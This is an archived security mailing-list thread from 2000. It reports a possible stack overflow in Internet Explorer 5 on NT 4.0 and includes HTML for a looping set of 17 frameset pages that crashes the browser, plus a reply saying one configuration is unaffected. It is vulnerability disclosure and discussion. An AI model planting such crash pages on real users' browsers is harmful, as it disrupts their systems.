Re: Stack Overflow in IE 5 (NT 4.0)

[Herakel Endrawes <herakel () UNIV HAIFA AC IL>]

IE 5 on NT 4. SP5 works fine. Does not open any blank buttons. A new URL
open fine also.

-----Original Message-----
From: Sherrod, Andrew [mailto:andrew.sherrod () TFN COM]
Sent: Tuesday, August 15, 2000 6:00 PM
To: VULN-DEV () SECURITYFOCUS COM
Subject: Stack Overflow in IE 5 (NT 4.0)


I am uncertain if this is exploitable, but it seems a possibility:

Create a web page as follows:

<HTML>
<HEAD>
<TITLE>
INFINITE FRAMES
</TITLE>
<FRAMESET rows=80,20>
<FRAME src="b.html">
<FRAME src="http://www.yahoo.com";>
</FRAMESET>
</HTML>

Save as "a.html".

Repeate, changing b to c and saving page as "b.html".

Continue through "q.html", which refers not to "r.html", but back to
"a.html":

(Text of q.html):

<HTML>
<HEAD>
<TITLE>
INFINITE FRAMES
</TITLE>
<FRAMESET cols=80,20>
<FRAME src="a.html">
<FRAME src="http://www.yahoo.com";>
</FRAMESET>
</HTML>

(Some cursory tests suggest 17 frames as the minimum to produce the
overflow.)

This page will have no effect on Netscape, which loads frames up through
q.html, leaving an empty frame where a.html should be.

IE 5 does the same, but also creates two blank buttons on the task bar and
sometimes briefly creates a floating white square in the upper left corner
of the screen. It does not crash immediately, but when a new URL is entered
a stack overflow occurs.

I haven't had time to fully examine this, or see if there is a means to
exploit the overflow.

AGS